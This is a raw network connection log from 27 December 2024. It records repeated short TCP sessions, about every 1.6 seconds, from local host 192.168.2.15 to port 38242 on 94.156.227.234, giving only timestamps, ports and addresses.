Dec 27, 2024 09:23:18.264014006 CET	38208	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:18.587754965 CET	38210	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:18.707386017 CET	38242	38210	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:18.707458019 CET	38210	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:18.707482100 CET	38210	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:18.827043056 CET	38242	38210	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:19.212022066 CET	38210	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:19.372560978 CET	38242	38210	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:19.895562887 CET	38242	38210	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:19.895637989 CET	38210	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:20.213207960 CET	38212	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:20.333054066 CET	38242	38212	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:20.333139896 CET	38212	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:20.333189964 CET	38212	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:20.452848911 CET	38242	38212	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:20.836622953 CET	38212	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:20.996639967 CET	38242	38212	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:21.527937889 CET	38242	38212	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:21.528011084 CET	38212	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:21.837487936 CET	38214	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:21.957194090 CET	38242	38214	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:21.957277060 CET	38214	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:21.957312107 CET	38214	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:22.076944113 CET	38242	38214	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:22.461651087 CET	38214	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:22.624613047 CET	38242	38214	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:23.088912010 CET	38242	38214	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:23.089036942 CET	38214	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:23.462851048 CET	38216	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:23.582670927 CET	38242	38216	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:23.582736969 CET	38216	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:23.582787037 CET	38216	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:23.702459097 CET	38242	38216	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:24.086569071 CET	38216	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:24.248775005 CET	38242	38216	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:24.743415117 CET	38242	38216	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:24.743504047 CET	38216	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:25.087557077 CET	38218	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:25.207262039 CET	38242	38218	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:25.207443953 CET	38218	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:25.207612991 CET	38218	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:25.327043056 CET	38242	38218	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:25.711357117 CET	38218	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:25.872654915 CET	38242	38218	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:26.399590015 CET	38242	38218	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:26.399678946 CET	38218	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:26.712233067 CET	38220	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:26.831887007 CET	38242	38220	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:26.832005024 CET	38220	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:26.832005024 CET	38220	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:26.951554060 CET	38242	38220	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:27.335186958 CET	38220	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:27.496716022 CET	38242	38220	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:28.166318893 CET	38242	38220	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:28.166445971 CET	38220	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:28.336082935 CET	38222	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:28.455782890 CET	38242	38222	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:28.455888033 CET	38222	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:28.455888033 CET	38222	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:28.575484037 CET	38242	38222	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:28.959270954 CET	38222	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:29.120606899 CET	38242	38222	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:29.628592014 CET	38242	38222	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:29.628674030 CET	38222	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:29.960217953 CET	38224	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:30.080257893 CET	38242	38224	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:30.080338955 CET	38224	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:30.080364943 CET	38224	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:30.199985027 CET	38242	38224	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:30.583667040 CET	38224	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:30.744558096 CET	38242	38224	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:31.264939070 CET	38242	38224	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:31.265042067 CET	38224	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:31.584484100 CET	38226	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:31.704143047 CET	38242	38226	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:31.704226971 CET	38226	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:31.704338074 CET	38226	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:31.823903084 CET	38242	38226	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:32.209331989 CET	38226	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:32.372808933 CET	38242	38226	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:32.844736099 CET	38242	38226	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:32.844809055 CET	38226	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:33.210589886 CET	38228	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:33.330307007 CET	38242	38228	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:33.330406904 CET	38228	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:33.330455065 CET	38228	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:33.450594902 CET	38242	38228	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:33.834791899 CET	38228	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:33.996661901 CET	38242	38228	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:34.545914888 CET	38242	38228	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:34.546000957 CET	38228	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:34.835891008 CET	38230	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:34.955549002 CET	38242	38230	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:34.955634117 CET	38230	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:34.955635071 CET	38230	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:35.075426102 CET	38242	38230	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:35.460000038 CET	38230	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:35.622299910 CET	38242	38230	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:36.119338989 CET	38242	38230	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:36.119451046 CET	38230	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:36.461066961 CET	38232	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:36.582181931 CET	38242	38232	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:36.582267046 CET	38232	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:36.582290888 CET	38232	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:36.703119993 CET	38242	38232	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:37.086020947 CET	38232	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:37.248663902 CET	38242	38232	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:37.831540108 CET	38242	38232	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:37.831608057 CET	38232	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:38.087261915 CET	38234	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:38.206954002 CET	38242	38234	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:38.207029104 CET	38234	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:38.207056046 CET	38234	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:38.326683044 CET	38242	38234	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:38.710769892 CET	38234	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:38.872629881 CET	38242	38234	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:39.344779968 CET	38242	38234	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:39.344886065 CET	38234	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:39.711709023 CET	38236	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:39.831389904 CET	38242	38236	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:39.831476927 CET	38236	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:39.831501007 CET	38236	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:39.951256037 CET	38242	38236	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:40.335081100 CET	38236	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:40.496706009 CET	38242	38236	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:41.044944048 CET	38242	38236	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:41.045033932 CET	38236	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:41.336103916 CET	38238	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:41.455969095 CET	38242	38238	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:41.456054926 CET	38238	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:41.456108093 CET	38238	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:41.575836897 CET	38242	38238	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:41.959948063 CET	38238	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:42.125134945 CET	38242	38238	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:42.615242958 CET	38242	38238	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:42.615334988 CET	38238	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:42.961077929 CET	38240	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:43.080851078 CET	38242	38240	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:43.080944061 CET	38240	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:43.080969095 CET	38240	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:43.200553894 CET	38242	38240	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:43.584481955 CET	38240	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:43.744654894 CET	38242	38240	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:44.305217981 CET	38242	38240	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:44.305337906 CET	38240	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:44.585505009 CET	38244	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:44.705327034 CET	38242	38244	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:44.705508947 CET	38244	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:44.705509901 CET	38244	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:44.825292110 CET	38242	38244	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:45.208623886 CET	38244	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:45.372653008 CET	38242	38244	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:45.854401112 CET	38242	38244	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:45.854542971 CET	38244	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:46.210088015 CET	38246	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:46.330121994 CET	38242	38246	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:46.330225945 CET	38246	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:46.330225945 CET	38246	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:46.449933052 CET	38242	38246	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:46.835714102 CET	38246	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:46.996664047 CET	38242	38246	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:47.534444094 CET	38242	38246	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:47.534550905 CET	38246	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:47.836708069 CET	38248	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:47.956501961 CET	38242	38248	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:47.956597090 CET	38248	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:47.956634045 CET	38248	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:48.076339960 CET	38242	38248	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:48.460562944 CET	38248	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:48.620599985 CET	38242	38248	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:49.278422117 CET	38242	38248	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:49.278527975 CET	38248	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:49.461709023 CET	38250	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:49.581657887 CET	38242	38250	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:49.581764936 CET	38250	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:49.581821918 CET	38250	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:49.701647043 CET	38242	38250	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:50.086292028 CET	38250	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:50.248667955 CET	38242	38250	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:50.746910095 CET	38242	38250	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:50.747067928 CET	38250	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:51.087511063 CET	38252	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:51.207346916 CET	38242	38252	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:51.207427025 CET	38252	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:51.207453966 CET	38252	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:51.327164888 CET	38242	38252	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:51.711002111 CET	38252	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:51.872628927 CET	38242	38252	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:52.358944893 CET	38242	38252	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:52.359016895 CET	38252	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:52.712023020 CET	38254	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:52.831702948 CET	38242	38254	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:52.831768990 CET	38254	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:52.831799030 CET	38254	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:52.951589108 CET	38242	38254	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:53.335856915 CET	38254	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:53.496726036 CET	38242	38254	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:54.000058889 CET	38242	38254	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:54.000121117 CET	38254	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:54.336826086 CET	38256	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:54.456641912 CET	38242	38256	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:54.456768036 CET	38256	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:54.456768036 CET	38256	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:54.576472998 CET	38242	38256	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:54.960695028 CET	38256	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:55.120774031 CET	38242	38256	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:55.615272045 CET	38242	38256	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:55.615338087 CET	38256	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:55.961813927 CET	38258	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:56.081598043 CET	38242	38258	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:56.081669092 CET	38258	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:56.081696033 CET	38258	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:56.201255083 CET	38242	38258	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:56.585692883 CET	38258	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:56.749165058 CET	38242	38258	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:57.246018887 CET	38242	38258	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:57.246117115 CET	38258	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:57.586821079 CET	38260	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:57.706551075 CET	38242	38260	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:57.706659079 CET	38260	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:57.706659079 CET	38260	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:57.826523066 CET	38242	38260	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:58.211648941 CET	38260	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:58.372770071 CET	38242	38260	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:58.842626095 CET	38242	38260	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:58.842761040 CET	38260	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:59.212945938 CET	38262	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:59.332705975 CET	38242	38262	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:59.332807064 CET	38262	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:59.332890034 CET	38262	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:59.452491999 CET	38242	38262	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:59.837579012 CET	38262	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:00.003108978 CET	38242	38262	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:00.515851021 CET	38242	38262	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:00.515964031 CET	38262	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:00.838898897 CET	38264	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:00.958596945 CET	38242	38264	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:00.958677053 CET	38264	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:00.958728075 CET	38264	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:01.078311920 CET	38242	38264	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:01.462470055 CET	38264	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:01.624840021 CET	38242	38264	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:02.070656061 CET	38242	38264	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:02.070801020 CET	38264	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:02.463812113 CET	38266	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:02.583554029 CET	38242	38266	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:02.583734035 CET	38266	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:02.583801031 CET	38266	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:02.703406096 CET	38242	38266	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:03.089762926 CET	38266	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:03.253767967 CET	38242	38266	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:03.730967045 CET	38242	38266	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:03.731050014 CET	38266	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:04.090951920 CET	38268	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:04.210674047 CET	38242	38268	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:04.210799932 CET	38268	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:04.210799932 CET	38268	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:04.330459118 CET	38242	38268	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:04.716976881 CET	38268	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:04.877743959 CET	38242	38268	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:05.422776937 CET	38242	38268	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:05.422947884 CET	38268	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:05.718558073 CET	38270	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:05.838270903 CET	38242	38270	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:05.838371038 CET	38270	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:05.838445902 CET	38270	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:05.958699942 CET	38242	38270	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:06.343509912 CET	38270	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:06.505970955 CET	38242	38270	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:07.062802076 CET	38242	38270	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:07.062916040 CET	38270	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:07.344757080 CET	38272	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:07.464495897 CET	38242	38272	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:07.464736938 CET	38272	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:07.464737892 CET	38272	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:07.584342957 CET	38242	38272	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:07.970091105 CET	38272	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:08.132836103 CET	38242	38272	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:08.625452995 CET	38242	38272	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:08.625714064 CET	38272	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:08.971734047 CET	38274	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:09.091495037 CET	38242	38274	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:09.091597080 CET	38274	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:09.091640949 CET	38274	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:09.211311102 CET	38242	38274	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:09.596510887 CET	38274	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:09.756994009 CET	38242	38274	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:10.293831110 CET	38242	38274	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:10.294092894 CET	38274	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:10.597994089 CET	38276	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:10.717704058 CET	38242	38276	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:10.717789888 CET	38276	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:10.717811108 CET	38276	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:10.837491035 CET	38242	38276	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:11.223355055 CET	38276	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:11.385118961 CET	38242	38276	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:11.849977016 CET	38242	38276	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:11.850081921 CET	38276	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:12.224926949 CET	38278	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:12.344595909 CET	38242	38278	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:12.344693899 CET	38278	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:12.344733953 CET	38278	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:12.464368105 CET	38242	38278	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:12.851881981 CET	38278	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:13.016729116 CET	38242	38278	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:13.557946920 CET	38242	38278	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:13.558202028 CET	38278	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:13.853337049 CET	38280	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:13.972954988 CET	38242	38280	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:13.973185062 CET	38280	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:13.973185062 CET	38280	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:14.094069004 CET	38242	38280	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:14.479154110 CET	38280	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:14.640686989 CET	38242	38280	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:15.176623106 CET	38242	38280	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:15.176898956 CET	38280	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:15.480519056 CET	38282	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:15.600153923 CET	38242	38282	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:15.600471020 CET	38282	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:15.600471020 CET	38282	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:15.720097065 CET	38242	38282	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:16.105609894 CET	38282	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:16.268915892 CET	38242	38282	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:16.716551065 CET	38242	38282	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:16.716670990 CET	38282	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:17.106770039 CET	38284	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:17.226520061 CET	38242	38284	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:17.226655006 CET	38284	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:17.226839066 CET	38284	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:17.346364021 CET	38242	38284	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:17.730170965 CET	38284	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:24:17.892751932 CET	38242	38284	94.156.227.234	192.168.2.15
Dec 27, 2024 09:24:18.395159960 CET	38242	38284	94.156.227.234	192.168.2.15
